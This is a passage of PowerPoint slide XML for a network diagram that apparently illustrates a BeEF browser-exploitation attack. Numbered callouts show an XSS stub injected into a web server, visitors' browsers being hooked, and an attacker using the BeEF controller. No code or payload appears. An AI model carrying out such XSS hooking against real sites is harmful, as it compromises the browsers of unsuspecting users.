          <p:cNvPr id="2059" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4598988" y="3414713"/>
            <a:ext cx="73025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060" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3876675" y="2881313"/>
            <a:ext cx="722313" cy="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061" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4598988" y="2279650"/>
            <a:ext cx="0" cy="2255838"/>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062" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3232150" y="4213225"/>
            <a:ext cx="298291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063" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4037013" y="4733925"/>
            <a:ext cx="1185862"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Firewall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4200525" y="3760788"/>
          <a:ext cx="857250" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267539" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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0525" y="3760788"/>
                        <a:ext cx="857250"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064" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2995613"/>
            <a:ext cx="504825"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DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2051" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4933950" y="2895600"/>
          <a:ext cx="857250" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267540" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319"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3950" y="2895600"/>
                        <a:ext cx="857250" cy="90011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065" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2133600"/>
            <a:ext cx="663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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2052" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3419475" y="2600325"/>
          <a:ext cx="860425" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267541" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">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2600325"/>
                        <a:ext cx="860425" cy="90011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066" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="469900" y="3033713"/>
            <a:ext cx="2903538" cy="2874962"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41852"/>
              <a:gd name="adj2" fmla="val -28134"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="5568950" y="3222625"/>
            <a:ext cx="2535238" cy="2185988"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39667"/>
              <a:gd name="adj2" fmla="val 20880"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2068" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="333375" y="2881313"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2057" name="Object 9"/>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67542" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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111" name="Rectangle 20"/>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2112" name="Group 21"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2113" name="Freeform 22"/>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14" name="Freeform 23"/>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15" name="Freeform 24"/>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16" name="Freeform 25"/>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17" name="Freeform 26"/>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18" name="Freeform 27"/>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19" name="Freeform 28"/>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20" name="Freeform 29"/>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21" name="Freeform 30"/>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22" name="Freeform 31"/>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23" name="Freeform 32"/>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24" name="Freeform 33"/>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25" name="Freeform 34"/>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26" name="Freeform 35"/>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27" name="Freeform 36"/>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28" name="Freeform 37"/>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29" name="Freeform 38"/>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30" name="Freeform 39"/>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31" name="Freeform 40"/>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32" name="Freeform 41"/>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33" name="Freeform 42"/>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34" name="Freeform 43"/>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35" name="Freeform 44"/>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2069" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8231188" y="4876800"/>
            <a:ext cx="608012"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Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2053" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6680200" y="2628900"/>
          <a:ext cx="857250" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267543" name="Clip" r:id="rId9" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId9" imgW="3135086" imgH="3278319" progId="">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0200" y="2628900"/>
                        <a:ext cx="857250" cy="90011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070" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="2314575"/>
            <a:ext cx="1262062"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Internal Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2071" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="1524000" y="2928938"/>
            <a:ext cx="1387475" cy="74295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1. BeEF XSS stub injected into web app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Freeform 50"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1155700" y="3295650"/>
            <a:ext cx="2422525" cy="530225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1526"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 334"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1526"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 334"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1526"/>
              <a:gd name="T5" fmla="*/ 0 h 334"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1526"/>
              <a:gd name="T10" fmla="*/ 0 h 334"/>
              <a:gd name="T11" fmla="*/ 1526 w 1526"/>
              <a:gd name="T12" fmla="*/ 334 h 334"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1526" h="334">
                <a:moveTo>
                  <a:pt x="0" y="163"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="497" y="235"/>
                  <a:pt x="987" y="334"/>
                  <a:pt x="1241" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1495" y="280"/>
                  <a:pt x="1467" y="64"/>
                  <a:pt x="1526" y="0"/>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2073" name="Line 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2347913"/>
            <a:ext cx="73025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074" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5549900" y="1928813"/>
            <a:ext cx="484188"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Mail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2054" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4906963" y="1828800"/>
          <a:ext cx="857250" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267544" name="Clip" r:id="rId10" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId10" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0"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6963" y="1828800"/>
                        <a:ext cx="857250" cy="90011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075" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7010400" y="3276600"/>
            <a:ext cx="1585913" cy="11699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2. User accesses web server… BeEF XSS hooks browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2076" name="Group 65"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="546100" y="4779963"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2056" name="Object 8"/>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67545" name="Clip" r:id="rId11" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId11" imgW="3135086" imgH="3278319" progId="">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086" name="Rectangle 67"/>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2087" name="Group 68"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2088" name="Freeform 69"/>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89" name="Freeform 70"/>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90" name="Freeform 71"/>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91" name="Freeform 72"/>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92" name="Freeform 73"/>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93" name="Freeform 74"/>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94" name="Freeform 75"/>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95" name="Freeform 76"/>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96" name="Freeform 77"/>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97" name="Freeform 78"/>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98" name="Freeform 79"/>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099" name="Freeform 80"/>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00" name="Freeform 81"/>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01" name="Freeform 82"/>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02" name="Freeform 83"/>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03" name="Freeform 84"/>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04" name="Freeform 85"/>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05" name="Freeform 86"/>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06" name="Freeform 87"/>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07" name="Freeform 88"/>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08" name="Freeform 89"/>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09" name="Freeform 90"/>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10" name="Freeform 91"/>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2077" name="Text Box 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="6096000"/>
            <a:ext cx="1344613"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BeEF Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2078" name="Freeform 95"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4022725" y="3505200"/>
            <a:ext cx="3657600" cy="1050925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2304"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 662"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2304"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 662"/>
              <a:gd name="T4" fmla="*/ 0 w 2304"/>
              <a:gd name="T5" fmla="*/ 0 h 662"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2304"/>
              <a:gd name="T10" fmla="*/ 0 h 662"/>
              <a:gd name="T11" fmla="*/ 2304 w 2304"/>
              <a:gd name="T12" fmla="*/ 662 h 662"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2304" h="662">
                <a:moveTo>
                  <a:pt x="2304" y="662"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1680" y="559"/>
                  <a:pt x="1056" y="456"/>
                  <a:pt x="672" y="346"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="236"/>
                  <a:pt x="144" y="118"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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2079" name="Text Box 94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="1804988" y="5186363"/>
            <a:ext cx="1752600" cy="74295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3. Browser reports to BeEF controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2080" name="Freeform 96"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4257675"/>
            <a:ext cx="6340475" cy="1198563"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3994"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3994"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T4" fmla="*/ 0 w 3994"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 755"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3994"/>
              <a:gd name="T10" fmla="*/ 0 h 755"/>
              <a:gd name="T11" fmla="*/ 3994 w 3994"/>
              <a:gd name="T12" fmla="*/ 755 h 755"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3994" h="755">
                <a:moveTo>
                  <a:pt x="3994" y="371"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3381" y="185"/>
                  <a:pt x="2768" y="0"/>
                  <a:pt x="2102" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1436" y="128"/>
                  <a:pt x="718" y="441"/>
                  <a:pt x="0" y="755"/>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2081" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945188" y="3594100"/>
            <a:ext cx="1295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p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1450975" y="3814763"/>
            <a:ext cx="1295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p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2083" name="Text Box 99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="914400" y="4191000"/>
            <a:ext cx="1752600" cy="74295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4. Attacker accesses BeEF controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2084" name="Freeform 100"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630238" y="4144963"/>
            <a:ext cx="161925" cy="609600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T1" fmla="*/ 0 h 384"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 384"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 102"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 384"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 102"/>
              <a:gd name="T10" fmla="*/ 0 h 384"/>
              <a:gd name="T11" fmla="*/ 102 w 102"/>
              <a:gd name="T12" fmla="*/ 384 h 384"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="102" h="384">
                <a:moveTo>
                  <a:pt x="6" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="83"/>
                  <a:pt x="0" y="167"/>
                  <a:pt x="16" y="231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="295"/>
                  <a:pt x="67" y="339"/>
                  <a:pt x="102" y="384"/>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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2055" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7504113" y="4411663"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s267546" name="Clip" r:id="rId12" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="3135086" imgH="3278319" progId="">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4113" y="4411663"/>
                        <a:ext cx="862012"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085" name="Text Box 99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
